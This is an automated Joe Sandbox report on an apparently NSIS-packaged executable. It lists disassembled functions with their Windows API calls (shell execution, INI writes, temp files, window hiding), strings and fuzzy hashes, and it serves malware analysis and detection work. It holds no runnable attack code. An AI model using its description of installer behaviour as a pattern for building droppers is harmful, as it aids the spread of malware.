                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                        • String ID:
                                                        • API String ID: 3376005127-0
                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                        • String ID:
                                                        • API String ID: 2568930968-0
                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                        APIs
                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                        Strings
                                                        • <RM>, xrefs: 00402713
                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                        • SyndicateMapHappensAttractionSexually, xrefs: 00402770
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                        • String ID: <RM>$SyndicateMapHappensAttractionSexually$WriteINIStr: wrote [%s] %s=%s in %s
                                                        • API String ID: 247603264-4212758423
                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                        APIs
                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,762323A0,00000000), ref: 00404FD6
                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FE6
                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FF9
                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                        Strings
                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                        • API String ID: 3156913733-2180253247
                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: nsa
                                                        • API String ID: 1716503409-2209301699
                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                        • String ID: HideWindow
                                                        • API String ID: 1249568736-780306582
                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                        • String ID:
                                                        • API String ID: 310444273-0
                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                        • String ID:
                                                        • API String ID: 4115351271-0
                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
